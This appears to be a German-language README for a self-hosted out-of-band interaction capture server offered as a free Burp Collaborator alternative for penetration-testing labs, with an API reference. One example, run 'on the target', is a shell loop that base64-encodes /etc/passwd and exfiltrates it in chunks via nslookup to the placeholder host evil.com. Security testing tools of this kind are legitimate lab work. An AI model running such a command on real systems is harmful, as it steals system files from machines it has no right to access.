Kostenlose Burp-Collaborator-Alternative – OOB-Interaktionserfassung (HTTP/HTTPS/DNS) mit SQLite & Exfil-Reassemblierung
Kostenlose, quelloffene Burp-Collaborator-Alternative für Penetration-Testing-Labs
Out-of-Band-(OOB-)Interaktionserfassung · HTTP/HTTPS · DNS · SQLite · Exfil-Reassemblierung
Phantom Grid ist ein selbst gehostetes Tool zur Erfassung von OOB-(Out-of-Band-)Interaktionen — eine kostenlose Alternative zu Burp Collaborator zum Lösen von Penetration-Testing-Labs (PortSwigger Web Security Academy, HackTheBox, TryHackMe usw.).
| Funktion | Beschreibung |
|---|---|
| HTTP- + HTTPS-Erfassung | Dual-Stack mit automatisch generierten selbstsignierten TLS-Zertifikaten |
| DNS-Erfassung | Integrierter DNS-Server auf Port 53 |
| DNS-Exfil-Reassemblierung | Automatische Chunk-Reassemblierung aus mehrteiliger DNS-Exfiltration |
| SQLite-Persistenz | Alle Daten überleben Server-Neustarts (WAL-Modus für Performance) |
| 40+ Payload-Vorlagen | SSRF, XXE, SQLi OOB, CMDi, SSTI, DNS-Exfil — bereit zum Kopieren |
| Taktisches Dashboard | Command-Center-UI mit Echtzeitüberwachung |
| Docker-Ready | Deployment mit einem Befehl |
| REST-API | Vollständige API für Token-/Interaktions-/Exfil-Verwaltung |
git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt
# HTTP only
python server/server.py
# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https
# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns
git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d
python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads
┌──────────────────────────────────────────────────────────────┐
│ PHANTOM GRID v2.0 │
│ │
│ ┌─────────────┐ ┌─────────────────────────────────┐ │
│ │ Dashboard │─API─▶│ Flask Server │ │
│ │ (React) │ │ │ │
│ └─────────────┘ │ :9090 HTTP capture + API │ │
│ │ :9443 HTTPS capture + API │ │
│ ┌─────────────┐ │ :53 DNS capture │ │
│ │ Target App │─────▶│ │ │
│ └─────────────┘ └──────────┬──────────────────────┘ │
│ │ │
│ ┌──────────▼──────────┐ │
│ │ SQLite Database │ │
│ │ phantom_grid.db │ │
│ │ │ │
│ │ tokens │ │
│ │ interactions │ │
│ │ dns_exfil_sessions │ │
│ │ dns_exfil_chunks │ │
│ └─────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────┘
Moderne Apps blockieren häufig Mixed-Content-Anfragen (http:// von https://-Seiten). Phantom Grid v2.0 betreibt HTTPS parallel zu HTTP.
python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443
python server/server.py --https \
--cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
--key /etc/letsencrypt/live/yourdomain/privkey.pem
python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically
Phantom Grid reassembliert automatisch fragmentierte DNS-Exfiltrationsdaten. Dies ist entscheidend für die Extraktion großer Payloads, die über mehrere DNS-Lookups aufgeteilt werden müssen (Labels sind auf 63 Bytes begrenzt).
| Format | Beispiel | Anwendungsfall |
|---|---|---|
| Einfach | data.TOKEN.domain | Einzelwert-Exfil |
| Indiziert | 0.chunk1.TOKEN.domain | Auto-Session, geordnete Chunks |
| Getaggt | sess1.0.chunk1.TOKEN.domain | Benannte Session mit Reihenfolge |
| Endsignal | end.sess1.TOKEN.domain | Session als abgeschlossen markieren |
/etc/passwd per DNS exfiltrierenAuf dem Ziel:
# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
chunk=$(echo "$data" | cut -c1-50)
data=$(echo "$data" | cut -c51-)
nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1
Reassemblierte Daten anzeigen:
curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil
Antwort:
[{
"session_tag": "exfil",
"completed": 1,
"chunk_count": 12,
"reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]
Alle Daten werden in phantom_grid.db unter Verwendung des SQLite-WAL-Modus für gleichzeitige Lese-/Schreibleistung gespeichert.
phantom_grid.db
├── tokens — Token metadata
├── interactions — All HTTP/DNS captures
├── dns_exfil_sessions — Grouped exfil sessions
└── dns_exfil_chunks — Individual exfil data chunks
Daten überleben Server-Neustarts. Sichern Sie die Daten durch Kopieren von phantom_grid.db.
| Methode | Endpunkt | Beschreibung |
|---|---|---|
GET | /api/tokens | Alle Tokens mit Statistiken auflisten |
POST | /api/tokens | Token erstellen {"label": "...", "notes": "..."} |
PATCH | /api/tokens/<id> | Token-Label/Notizen aktualisieren |
DELETE | /api/tokens/<id> | Token + alle Daten löschen (CASCADE) |
| Methode | Endpunkt | Beschreibung |
|---|---|---|
GET | /api/tokens/<id>/interactions?limit=&offset= | Token-Interaktionen abrufen |
DELETE | /api/tokens/<id>/interactions | Interaktionen löschen |
GET | /api/log?limit= | Globales Log (alle Tokens) |
GET | /api/poll?since=<ISO> | Neue Interaktionen abfragen |
| Methode | Endpunkt | Beschreibung |
|---|---|---|
GET | /api/tokens/<id>/exfil | Exfil-Sessions mit reassemblierten Daten abrufen |
| Methode | Endpunkt | Beschreibung |
|---|---|---|
GET | /api/stats | Globale Statistiken (Anzahlen, DB-Größe) |
GET | /health | Health-Check |